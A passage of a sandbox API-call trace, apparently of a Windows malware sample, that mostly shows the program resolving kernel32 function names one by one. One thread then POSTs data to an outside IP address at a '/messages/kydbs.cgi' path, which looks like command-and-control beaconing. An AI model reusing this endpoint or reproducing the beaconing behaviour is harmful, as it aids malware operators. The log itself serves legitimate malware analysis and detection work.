(lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0090.551] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0090.551] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0090.551] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0090.551] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0090.551] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0090.551] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0090.551] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0090.551] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0090.551] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0090.551] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0090.551] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0090.551] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0090.551] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0090.551] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0090.551] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0090.551] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0090.551] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0090.551] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0090.551] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0090.551] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0090.551] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0090.551] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0090.551] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0090.551] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0090.551] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0090.551] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0090.552] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0090.552] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0090.552] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0090.552] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0090.552] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0090.552] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0090.552] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0090.552] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0090.552] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0090.552] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0090.552] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0090.552] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0090.552] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0090.552] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0090.552] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0090.552] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0090.552] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0090.552] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0090.552] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0090.552] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0090.552] lstrcpyA (in: lpString1=0x3c2ea34, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0090.552] InternetCrackUrlA (in: lpszUrl="http://91.218.114.4/messages/kydbs.cgi?o=6hs&k=yw33&c=21nd", dwUrlLength=0x3a, dwFlags=0x0, lpUrlComponents=0x3c2f6c4 | out: lpUrlComponents=0x3c2f6c4) returned 1 [0090.552] VirtualAlloc (lpAddress=0x0, dwSize=0x1400, flAllocationType=0x3000, flProtect=0x4) returned 0x130000 [0090.553] InternetConnectA (hInternet=0xcc0010, lpszServerName="91.218.114.4", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0014 [0090.554] HttpOpenRequestA (hConnect=0xcc0014, lpszVerb="POST", lpszObjectName="/messages/kydbs.cgi?o=6hs&k=yw33&c=21nd", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0018 [0090.554] HttpSendRequestA (hRequest=0xcc0018, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x2f, lpOptional=0xf10000*, dwOptionalLength=0x31) Thread: id = 125 os_tid = 0x408 [0092.960] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x160000 [0092.961] VirtualAlloc (lpAddress=0x0, dwSize=0x804, flAllocationType=0x3000, flProtect=0x4) returned 0x170000 [0092.961] lstrlenA (lpString="kernel32.dll") returned 12 [0092.961] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0092.961] lstrcpyA (in: lpString1=0x49af2a4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0092.961] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0092.961] lstrcpyA (in: lpString1=0x49af2a4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0092.961] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0092.961] lstrcpyA (in: lpString1=0x49af2a4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0092.961] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0092.961] lstrcpyA (in: lpString1=0x49af2a4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0092.961] lstrlenA (lpString="ADDATOMA") returned 8 [0092.961] lstrcpyA (in: lpString1=0x49af2a4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0092.962] lstrlenA (lpString="ADDATOMW") returned 8 [0092.962] lstrcpyA (in: lpString1=0x49af2a4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0092.962] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0092.962] lstrcpyA (in: lpString1=0x49af2a4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0092.962] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0092.962] lstrcpyA (in: lpString1=0x49af2a4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0092.962] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0092.962] lstrcpyA (in: lpString1=0x49af2a4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0092.962] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0092.962] lstrcpyA (in: lpString1=0x49af2a4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0092.962] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0092.962] lstrcpyA (in: lpString1=0x49af2a4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0092.962] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0092.962] lstrcpyA (in: lpString1=0x49af2a4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0092.962] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0092.962] lstrcpyA (in: lpString1=0x49af2a4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0092.962] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0092.962] lstrcpyA (in: lpString1=0x49af2a4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0092.962] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0092.962] lstrcpyA (in: lpString1=0x49af2a4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0092.962] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0092.962] lstrcpyA (in: lpString1=0x49af2a4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0092.962] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0092.962] lstrcpyA (in: lpString1=0x49af2a4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0092.962] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0092.962] lstrcpyA (in: lpString1=0x49af2a4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0092.962] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0092.962] lstrcpyA (in: lpString1=0x49af2a4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0092.962] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0092.962] lstrcpyA (in: lpString1=0x49af2a4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0092.962] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0092.962] lstrcpyA (in: lpString1=0x49af2a4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0092.962] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0092.962] lstrcpyA (in: lpString1=0x49af2a4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0092.963] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0092.963] lstrcpyA (in: lpString1=0x49af2a4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0092.963] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0092.963] lstrcpyA (in: lpString1=0x49af2a4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0092.963] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0092.963] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0092.963] lstrlenA (lpString="BACKUPREAD") returned 10 [0092.963] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0092.963] lstrlenA (lpString="BACKUPSEEK") returned 10 [0092.963] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0092.963] lstrlenA (lpString="BACKUPWRITE") returned 11 [0092.963] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0092.963] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0092.963] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0092.963] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0092.963] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0092.963] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0092.963] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0092.963] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0092.963] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0092.963] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0092.963] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0092.963] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0092.963] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0092.963] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0092.963] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0092.963] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0092.963] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0092.963] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0092.963] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0092.963] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0092.963] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0092.963] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0092.963] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0092.964] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0092.964] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0092.964] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0092.964] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0092.964] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0092.964] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0092.964] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0092.964] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0092.964] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0092.964] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0092.964] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0092.964] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0092.964] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0092.964] lstrcpyA (in: lpString1=0x49af2a4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0092.964] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0092.964] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0092.964] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0092.964] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0092.964] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0092.964] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0092.964] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0092.964] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0092.964] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0092.964] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0092.964] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0092.964] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0092.964] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0092.964] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0092.964] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0092.964] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0092.964] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0092.964] lstrcpyA (in: lpString1=0x49af2a4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0092.964] lstrlenA (lpString="BEEP") returned 4 [0092.965] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0092.965] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0092.965] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0092.965] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0092.965] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0092.965] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0092.965] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0092.965] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0092.965] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0092.965] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0092.965] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0092.965] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0092.965] lstrcpyA (in: lpString1=0x49af2a4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0092.965] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0092.965] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0092.965] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0092.965] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0092.965] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0092.965] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0092.965] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0092.965] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0092.965] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0092.965] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0092.965] lstrlenA (lpString="CANCELIO") returned 8 [0092.965] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0092.965] lstrlenA (lpString="CANCELIOEX") returned 10 [0092.965] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0092.965] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0092.965] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0092.965] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0092.965] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0092.965] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0092.965] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0092.966] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0092.966] lstrcpyA (in: lpString1=0x49af2a4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0092.966] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0092.966] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0092.966] lstrlenA (lpString="CHECKELEVATION") returned 14 [0092.966] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0092.966] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0092.966] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0092.966] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0092.966] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0092.966] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0092.966] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0092.966] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0092.966] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0092.966] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0092.966] lstrcpyA (in: lpString1=0x49af2a4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0092.966] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0092.966] lstrcpyA (in: lpString1=0x49af2a4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0092.966] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0092.966] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0092.966] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0092.966] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0092.966] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0092.966] lstrcpyA (in: lpString1=0x49af2a4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0092.966] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0092.966] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0092.966] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0092.966] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0092.966] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0092.966] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0092.966] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0092.966] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0092.966] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0092.967] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0092.967] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0092.967] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0092.967] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0092.967] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0092.967] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0092.967] lstrcpyA (in: lpString1=0x49af2a4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0092.967] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 